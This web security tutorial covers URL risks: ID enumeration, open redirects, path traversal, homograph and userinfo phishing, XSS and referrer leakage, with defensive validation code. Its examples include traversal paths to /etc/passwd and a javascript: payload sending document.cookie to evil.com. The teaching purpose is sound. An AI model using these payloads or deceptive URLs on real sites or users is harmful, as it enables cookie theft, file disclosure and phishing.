06: URL Security - URLs Tutorials

Why URLs Are a Security Concern

URLs are user-visible, modifiable, and trusted by both browsers and users. This creates security risks:

User-controllable: Anyone can type or modify a URL
Visible to others: URLs appear in logs, referrer headers, and browser history
Trusted by default: Users and systems tend to trust URL content
Part of the attack surface: URLs are input vectors for your application

Parameter Manipulation

Attackers can modify URL parameters to access unauthorized resources or bypass controls.

Direct Object Reference

When URLs directly expose database IDs, users can enumerate or access others' data:

// Vulnerable: User can change ID to view others' invoices
https://example.com/invoices/12345
https://example.com/invoices/12346  // Just increment!

// User changes their own profile URL
https://example.com/api/users/42/settings
https://example.com/api/users/43/settings  // Access other user!

Privilege Escalation

Parameters controlling permissions can be manipulated:

// Vulnerable: admin parameter in URL
https://example.com/dashboard?admin=false
https://example.com/dashboard?admin=true  // Attacker tries this

// Vulnerable: role in query string
https://example.com/api/user?role=viewer
https://example.com/api/user?role=admin

Prevention

Always verify authorization server-side
Use indirect references (tokens) instead of direct IDs when possible
Never trust client-provided role or permission data
Log and monitor unusual access patterns

Open Redirect Vulnerabilities

An open redirect occurs when an application redirects users to a URL specified in a parameter without validation. Attackers use this to redirect users to malicious sites while the URL appears to come from a trusted domain.

The Attack

// Legitimate use: redirect after login
https://example.com/login?redirect=/dashboard

// Attacker crafts phishing link
https://example.com/login?redirect=https://evil-site.com/fake-login

// User sees "example.com" and trusts it, but ends up on attacker's site

Why It's Dangerous

Users trust the original domain in the URL
Can be used to steal credentials via fake login pages
Bypasses email and browser security warnings
Often used in phishing campaigns

Prevention

// Validate redirect URLs
function isValidRedirect(url) {
  // Only allow relative paths
  if (url.startsWith('/') && !url.startsWith('//')) {
    return true;
  }

  // Or validate against allowlist of domains
  try {
    const parsed = new URL(url, window.location.origin);
    const allowedHosts = ['example.com', 'sub.example.com'];
    return allowedHosts.includes(parsed.hostname);
  } catch {
    return false;
  }
}

// Usage
const redirect = params.get('redirect');
if (isValidRedirect(redirect)) {
  window.location.href = redirect;
} else {
  window.location.href = '/'; // Safe default
}

Path Traversal Attacks

Path traversal (directory traversal) uses URL path manipulation to access files outside the intended directory.

The Attack

// Normal request
https://example.com/files/report.pdf

// Path traversal attempt
https://example.com/files/../../../etc/passwd
https://example.com/files/..%2F..%2F..%2Fetc%2Fpasswd

// Double-encoded variant
https://example.com/files/..%252F..%252F..%252Fetc%252Fpasswd

Prevention

Never construct file paths directly from URL input
Use allowlists of valid files or directories
Sanitize input: reject or remove .. sequences
Resolve paths and verify they're within allowed directories
Use your framework's built-in file serving with proper sandboxing

// Dangerous: directly using URL parameter as path
const filename = req.params.file;
fs.readFile(`./uploads/${filename}`);  // BAD!

// Safer: validate and resolve path
const path = require('path');
const safePath = path.resolve('./uploads', filename);

// Ensure resolved path is still within uploads directory
if (!safePath.startsWith(path.resolve('./uploads'))) {
  throw new Error('Invalid path');
}

URL-Based Phishing Techniques

Attackers use various URL manipulation techniques to make malicious links appear trustworthy.

Homograph Attacks

Using characters that look similar but are different Unicode code points:

// Legitimate
https://example.com

// Homograph attack using Cyrillic 'а' (U+0430) instead of Latin 'a' (U+0061)
https://exаmple.com  // Looks identical but different domain!

Subdomain Deception

// User expects: example.com
// Attacker creates: example.com.evil-site.net

// Or uses confusing subdomain structure
https://login.example.com.secure-verify.net
https://www.example.com.account-verify.net

URL Shortening Obfuscation

// User can't see destination
https://bit.ly/3xyz123  // Could go anywhere

Userinfo Field Abuse

The URL standard allows userinfo before the host, which can be misleading:

// User thinks they're going to google.com
https://google.com@evil-site.net

// The actual host is evil-site.net
// "google.com" is just the username!

XSS via URLs

Cross-Site Scripting (XSS) attacks can use URLs to inject malicious scripts.

Reflected XSS

// Vulnerable: displaying search term without encoding
https://example.com/search?q=<script>alert('XSS')</script>

// If the server renders this directly into HTML:
<p>Results for: <script>alert('XSS')</script></p>

javascript: URLs

// If user-provided URLs are used in href without validation:
<a href="javascript:alert('XSS')">Click me</a>

// Attacker provides:
https://example.com/redirect?url=javascript:document.location='https://evil.com/steal?c='+document.cookie

Prevention

Always HTML-encode URL parameters when displaying them
Validate URL schemes (allow only http: and https:)
Use Content Security Policy (CSP) headers
Use your framework's built-in escaping functions

// Validate URL before using in href
function isSafeUrl(url) {
  try {
    const parsed = new URL(url, window.location.origin);
    return ['http:', 'https:'].includes(parsed.protocol);
  } catch {
    return false;
  }
}

Sensitive Data in URLs

URLs are logged, cached, and shared in ways that can expose sensitive data.

Where URLs Are Exposed

Browser history: Accessible to anyone with device access
Server logs: URLs are logged by web servers, proxies, CDNs
Referrer headers: The previous page's URL is sent to external links
Bookmarks and sharing: Users may share URLs containing sensitive data
Analytics tools: URLs often captured for traffic analysis
Browser extensions: May have access to URLs

What Not to Put in URLs

Passwords or API keys
Session tokens (use cookies instead)
Personally identifiable information (SSN, credit cards)
Security tokens (CSRF tokens are okay but prefer headers)

// BAD: API key in URL
https://api.example.com/data?api_key=secret123

// BAD: Session token in URL
https://example.com/dashboard?session=abc123xyz

// BAD: Personal data in URL
https://example.com/user?ssn=123-45-6789

// GOOD: Use headers instead
fetch('/api/data', {
  headers: {
    'Authorization': 'Bearer secret123',
    'X-Session-Token': 'abc123xyz'
  }
});

Referrer Leakage

When linking to external sites, the current page's URL is sent as the Referer header:

// User is on: https://example.com/account?token=secret
// They click external link to: https://external.com

// External site receives:
Referer: https://example.com/account?token=secret
// The token is now exposed!

Prevention:

<!-- Control referrer for specific links -->
<a href="https://external.com" rel="noreferrer">External Link</a>

<!-- Or set policy for entire page -->
<meta name="referrer" content="strict-origin-when-cross-origin">

URL Validation Best Practices

Comprehensive URL Validation Function

function validateUserUrl(input, options = {}) {
  const {
    allowedSchemes = ['https:', 'http:'],
    allowedHosts = null,  // null means any host
    requireHttps = false,
    maxLength = 2000
  } = options;

  // Length check
  if (input.length > maxLength) {
    return { valid: false, reason: 'URL too long' };
  }

  // Try parsing
  let url;
  try {
    url = new URL(input);
  } catch {
    return { valid: false, reason: 'Invalid URL format' };
  }

  // Scheme validation
  if (!allowedSchemes.includes(url.protocol)) {
    return { valid: false, reason: 'Invalid protocol' };
  }

  // HTTPS requirement
  if (requireHttps && url.protocol !== 'https:') {
    return { valid: false, reason: 'HTTPS required' };
  }

  // Host allowlist
  if (allowedHosts && !allowedHosts.includes(url.hostname)) {
    return { valid: false, reason: 'Host not allowed' };
  }

  // Reject userinfo (potential phishing)
  if (url.username || url.password) {
    return { valid: false, reason: 'Credentials in URL not allowed' };
  }

  return { valid: true, url };
}

// Usage
const result = validateUserUrl(userInput, {
  allowedSchemes: ['https:'],
  requireHttps: true
});

if (result.valid) {
  // Safe to use result.url
}

Security Checklist

Validate scheme (protocol) against allowlist
Check host against allowlist if redirecting
Reject userinfo (username:password@ format)
Limit URL length
URL-encode user data in parameters
HTML-encode URLs when displaying
Use rel="noreferrer" for external links
Don't put sensitive data in URLs